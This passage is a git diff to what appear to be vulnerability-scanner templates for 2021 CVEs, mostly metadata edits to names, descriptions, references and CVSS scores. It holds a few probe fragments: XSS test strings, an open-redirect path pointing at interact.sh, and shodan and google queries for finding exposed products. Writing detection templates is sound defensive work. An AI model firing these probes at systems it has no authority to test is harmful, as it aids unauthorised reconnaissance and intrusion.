     - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
+    - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-29203
     cwe-id: CWE-287
-  tags: hpe,cve,cve2021,bypass
+  tags: hpe,cve,cve2021,bypass,tenable
 
 requests:
   - raw:
@@ -53,3 +52,5 @@ requests:
         part: body
         words:
           - "Base.1.0.Created"
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml
index 30935e23c5..7ff1c835a5 100644
--- a/cves/2021/CVE-2021-29441.yaml
+++ b/cves/2021/CVE-2021-29441.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-29441
 
 info:
-  name: Nacos prior to 1.4.1 Authentication Bypass
+  name: Nacos <1.4.1 - Authentication Bypass
   author: dwisiswant0
   severity: critical
   description: |
@@ -14,6 +14,9 @@ info:
     This issue may allow any user to carry out any administrative tasks on the Nacos server.
   reference:
     - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
+    - https://github.com/alibaba/nacos/issues/4701
+    - https://github.com/advisories/GHSA-36hp-jr8h-556f
+    - https://github.com/alibaba/nacos/pull/4703
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -52,4 +55,6 @@ requests:
       - type: word
         words:
           - "application/json"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml
index e304d78db3..18472b1e65 100644
--- a/cves/2021/CVE-2021-29442.yaml
+++ b/cves/2021/CVE-2021-29442.yaml
@@ -1,15 +1,17 @@
 id: CVE-2021-29442
 
 info:
-  name: Nacos prior to 1.4.1 Missing Authentication Check
+  name: Nacos <1.4.1 - Authentication Bypass
   author: dwisiswant0
   severity: high
   description: |
-    In Nacos before version 1.4.1, the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out.
-    While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users.
-    These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)
+    Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).
   reference:
     - https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
+    - https://github.com/alibaba/nacos/issues/4463
+    - https://github.com/alibaba/nacos/pull/4517
+    - https://github.com/advisories/GHSA-36hp-jr8h-556f
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-29442
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -34,3 +36,5 @@ requests:
         regex:
           - "\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""
         part: body
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml
index a686394e3f..78b0a64cca 100644
--- a/cves/2021/CVE-2021-29484.yaml
+++ b/cves/2021/CVE-2021-29484.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-29484
 
 info:
-  name: DOM XSS in Ghost CMS
+  name: Ghost CMS <=4.32 - Cross-Site Scripting
   author: rootxharsh,iamnoooob
   severity: medium
-  description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged
-    in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site.
+  description: Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code.
   reference:
     - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
+    - https://www.npmjs.com/package/ghost
+    - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290
     - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
+  remediation: This issue has been fixed in 4.3.3.
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
+    cvss-score: 6.8
     cve-id: CVE-2021-29484
-    cwe-id: CWE-79
+    cwe-id: CWE-79,CWE-79
   tags: cve,cve2021,xss,ghost
 
 requests:
@@ -36,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml
index 9b3ebadcc0..144d5434a0 100644
--- a/cves/2021/CVE-2021-29622.yaml
+++ b/cves/2021/CVE-2021-29622.yaml
@@ -4,10 +4,11 @@ info:
   name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
   author: geeknik
   severity: medium
-  description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft
-    an URL that can redirect to any other URL, in the /new endpoint.
+  description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
   reference:
     - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
+    - https://github.com/prometheus/prometheus/releases/tag/v2.26.1
+    - https://github.com/prometheus/prometheus/releases/tag/v2.27.1
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -18,10 +19,10 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/new/newhttp://example.com"
+      - "{{BaseURL}}/new/newhttp://interact.sh"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml
index c0308952cb..e95886aacf 100644
--- a/cves/2021/CVE-2021-29625.yaml
+++ b/cves/2021/CVE-2021-29625.yaml
@@ -1,16 +1,15 @@
 id: CVE-2021-29625
 
 info:
-  name: Adminer reflected XSS via the table parameter
+  name: Adminer <=4.8.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases
-    prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers
-    without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g.
-    `mysqli`) or disable displaying PHP errors (`display_errors`).
+  description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled).
   reference:
     - https://sourceforge.net/p/adminer/bugs-and-features/797/
-    - https://www.cvedetails.com/cve/CVE-2021-29625/
+    - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-29625
+  remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-3002.yaml b/cves/2021/CVE-2021-3002.yaml
index 5240ad1afd..13f4e8607d 100644
--- a/cves/2021/CVE-2021-3002.yaml
+++ b/cves/2021/CVE-2021-3002.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-3002
 
 info:
-  name: Seo Panel 4.8.0 - Post based Reflected XSS
+  name: Seo Panel 4.8.0 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.
+  description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
     - http://www.cinquino.eu/SeoPanelReflect.htm
+    - https://github.com/seopanel/Seo-Panel/issues/202
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -40,4 +41,6 @@ requests:
         words:
           - "<img src=a onerror=alert(document.domain)>"
           - "seopanel"
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-30049.yaml b/cves/2021/CVE-2021-30049.yaml
index 6cff3a24b3..356dc34913 100644
--- a/cves/2021/CVE-2021-30049.yaml
+++ b/cves/2021/CVE-2021-30049.yaml
@@ -1,13 +1,13 @@
 id: CVE-2021-30049
 
 info:
-  name: SysAid Technologies 20.3.64 b14 Reflected XSS
+  name: SysAid Technologies 20.3.64 b14 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI.
+  description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.
   reference:
     - https://eh337.net/2021/03/30/sysaid/
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-30049
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml
index 8b67e5b577..ff25ad6b7f 100644
--- a/cves/2021/CVE-2021-30151.yaml
+++ b/cves/2021/CVE-2021-30151.yaml
@@ -1,12 +1,13 @@
 id: CVE-2021-30151
 
 info:
-  name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting
+  name: Sidekiq <=6.2.0 - Cross-Site Scripting
   author: DhiyaneshDk
   severity: medium
-  description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
+  description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used.
   reference:
     - https://github.com/mperham/sidekiq/issues/4852
+    - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-30151
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml
index e73d683641..9e6f74a51a 100644
--- a/cves/2021/CVE-2021-3017.yaml
+++ b/cves/2021/CVE-2021-3017.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-3017
 
 info:
-  name: Intelbras WIN 300/WRN 342 Credential Disclosure
+  name: Intelbras WIN 300/WRN 342 - Credentials Disclosure
   author: pikpikcu
   severity: high
   description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
   reference:
-    - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-3017
+    - https://pastebin.com/cTYTf0Yn
+    - https://www.intelbras.com/pt-br/ajuda-download/faq/roteador-wireless-veloz-wrn-342
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2021/CVE-2021-30213.yaml b/cves/2021/CVE-2021-30213.yaml
index d0648be2c4..136e5b6b3b 100644
--- a/cves/2021/CVE-2021-30213.yaml
+++ b/cves/2021/CVE-2021-30213.yaml
@@ -1,11 +1,12 @@
 id: CVE-2021-30213
 
 info:
-  name: Knowage Suite 7.3 XSS
+  name: Knowage Suite 7.3 - Cross-Site Scripting
   author: alph4byt3
   severity: medium
-  description: Knowage Suite 7.3 is vulnerable to unauthenticated reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
+  description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
   reference:
+    - https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md
     - https://nvd.nist.gov/vuln/detail/CVE-2021-30213
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +35,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml
index 1cf544a3c5..c82930105f 100644
--- a/cves/2021/CVE-2021-30461.yaml
+++ b/cves/2021/CVE-2021-30461.yaml
@@ -1,17 +1,22 @@
 id: CVE-2021-30461
 
 info:
-  name: VoipMonitor Pre-Auth-RCE
+  name: VoipMonitor <24.61 - Remote Code Execution
   author: shifacyclewala,hackergautam
   severity: critical
-  description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
+  description: |
+    VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing  remote unauthenticated users to trigger a remote PHP code execution vulnerability.
   reference:
     - https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-30461
+    - https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-30461
     cwe-id: CWE-94
+  metadata:
+    shodan-query: http.title:"VoIPmonitor"
   tags: cve,cve2021,rce,voipmonitor
 
 requests:
@@ -38,3 +43,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-30497.yaml b/cves/2021/CVE-2021-30497.yaml
index ad0b73303a..1a53836672 100644
--- a/cves/2021/CVE-2021-30497.yaml
+++ b/cves/2021/CVE-2021-30497.yaml
@@ -1,17 +1,21 @@
 id: CVE-2021-30497
 
 info:
-  name: Ivanti Avalanche Directory Traversal
+  name: Ivanti Avalanche 6.3.2 - Local File Inclusion
   author: gy741
   severity: high
-  description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
+  description: Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.
   reference:
     - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
+    - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US
+    - https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30497
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.50
+    cvss-score: 7.5
     cve-id: CVE-2021-30497
-  tags: cve,cve2021,avalanche,traversal
+    cwe-id: CWE-36
+  tags: cve,cve2021,avalanche,traversal,lfi
 
 requests:
   - method: GET
@@ -28,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/14
diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml
index 66a6e796e7..691a739a17 100644
--- a/cves/2021/CVE-2021-31249.yaml
+++ b/cves/2021/CVE-2021-31249.yaml
@@ -4,10 +4,11 @@ info:
   name: CHIYU TCP/IP Converter devices - CRLF injection
   author: geeknik
   severity: medium
-  description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple
-    CGI components.
+  description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components.
   reference:
     - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
+    - https://www.chiyu-tech.com/msg/message-Firmware-update-87.html
+    - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
     cvss-score: 6.5
diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml
index 2042662d3a..45d9bde403 100644
--- a/cves/2021/CVE-2021-31250.yaml
+++ b/cves/2021/CVE-2021-31250.yaml
@@ -1,12 +1,15 @@
 id: CVE-2021-31250
 
 info:
-  name: CHIYU IoT XSS
+  name: CHIYU TCP/IP Converter - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
+  description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi.
   reference:
     - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
+    - https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm
+    - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-31250
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
@@ -32,3 +35,5 @@ requests:
         part: body
         words:
           - "\"><script>alert({{randstr}})</script>"
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml
index 106b961d3f..fe9b4f1397 100644
--- a/cves/2021/CVE-2021-3129.yaml
+++ b/cves/2021/CVE-2021-3129.yaml
@@ -1,19 +1,20 @@
 id: CVE-2021-3129
 
 info:
-  name: Laravel <= v8.4.2 Debug Mode - Remote Code Execution
+  name: Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution
   author: z3bd,pdteam
   severity: critical
-  description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents().
-    This is exploitable on sites using debug mode with Laravel before 8.4.2.
+  description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
   reference:
     - https://www.ambionics.io/blog/laravel-debug-rce
     - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3129
+    - https://github.com/facade/ignition/pull/334
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-3129
-  tags: cve,cve2021,laravel,rce
+  tags: cve,cve2021,laravel,rce,vulhub
 
 requests:
   - raw:
@@ -84,3 +85,5 @@ requests:
       - type: regex
         regex:
           - "(u|g)id=.*"
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml
index f4555c4895..26717b3613 100644
--- a/cves/2021/CVE-2021-31537.yaml
+++ b/cves/2021/CVE-2021-31537.yaml
@@ -1,18 +1,21 @@
 id: CVE-2021-31537
 
 info:
-  name: SIS-REWE GO version 7.5.0/12C XSS
+  name: SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
+  description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
   reference:
     - https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
+    - http://seclists.org/fulldisclosure/2021/May/20
+    - https://sisinformatik.com/rewe-go/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-31537
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-31537
     cwe-id: CWE-79
-  tags: cve,cve2021,xss
+  tags: cve,cve2021,xss,seclists
 
 requests:
   - method: GET
@@ -32,3 +35,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-31589.yaml b/cves/2021/CVE-2021-31589.yaml
index 247798444f..6d465e9212 100644
--- a/cves/2021/CVE-2021-31589.yaml
+++ b/cves/2021/CVE-2021-31589.yaml
@@ -1,23 +1,25 @@
 id: CVE-2021-31589
 
 info:
-  name: BeyondTrust Remote Support Reflected XSS
+  name: BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting
   author: Ahmed Abou-Ela
   severity: medium
-  description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML.
+  description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML.
   reference:
     - https://packetstormsecurity.com/files/165408
     - https://cxsecurity.com/issue/WLB-2022010013
     - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb
+    - https://www.beyondtrust.com/docs/release-notes/index.htm
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-31589
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
-    cvss-score: 5.4
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2021-31589
     cwe-id: CWE-79
   metadata:
+    google-query: '"BeyondTrust" "Redistribution Prohibited"'
     shodan-query: 'set-cookie: nsbase_session'
-    google-dork: '"BeyondTrust" "Redistribution Prohibited"'
-  tags: cve,cve2021,beyondtrust,bomgar,xss
+  tags: xss,packetstorm,cve,cve2021,beyondtrust,bomgar
 
 requests:
   - method: GET
@@ -37,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-31602.yaml b/cves/2021/CVE-2021-31602.yaml
index 57f4dcdad1..d27a41531d 100644
--- a/cves/2021/CVE-2021-31602.yaml
+++ b/cves/2021/CVE-2021-31602.yaml
@@ -1,16 +1,16 @@
 id: CVE-2021-31602
 
 info:
-  name: Pentaho <= 9.1 Authentication Bypass of Spring APIs
+  name: Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass
   author: pussycat0x
   severity: high
-  description: An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is
-    the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings
-    to extract pieces of information without possessing valid credentials.
+  description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.
   reference:
     - https://seclists.org/fulldisclosure/2021/Nov/13
     - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software
     - https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
+    - https://www.hitachi.com/hirt/security/index.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31602
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -18,7 +18,7 @@ info:
     cwe-id: CWE-863
   metadata:
     shodan-query: Pentaho
-  tags: cve,cve2021,pentaho,auth-bypass,spring
+  tags: spring,seclists,cve,cve2021,pentaho,auth-bypass
 
 requests:
   - method: GET
@@ -39,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2021/CVE-2021-31682.yaml b/cves/2021/CVE-2021-31682.yaml
index 9168b75601..742659d2c8 100644
--- a/cves/2021/CVE-2021-31682.yaml
+++ b/cves/2021/CVE-2021-31682.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-31682
 
 info:
-  name: WebCTRL OEM <= 6.5 Reflected Cross-Site Scripting
+  name: WebCTRL OEM <= 6.5 Cross-Site Scripting
   author: gy741,dhiyaneshDk
   severity: medium
   description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-31682
     - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS
+    - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml
index 2e3d564f16..62c5ce19ca 100644
--- a/cves/2021/CVE-2021-31755.yaml
+++ b/cves/2021/CVE-2021-31755.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-31755
     cwe-id: CWE-787
-  tags: cve,cve2021,tenda,rce,oast,router,mirai
+  tags: cve,cve2021,tenda,rce,oast,router,mirai,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-31805.yaml b/cves/2021/CVE-2021-31805.yaml
index ca2262d50f..2394432a9e 100644
--- a/cves/2021/CVE-2021-31805.yaml
+++ b/cves/2021/CVE-2021-31805.yaml
@@ -4,18 +4,17 @@ info:
   name: Apache Struts2 S2-062 - Remote Code Execution
   author: taielab
   severity: critical
-  description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation
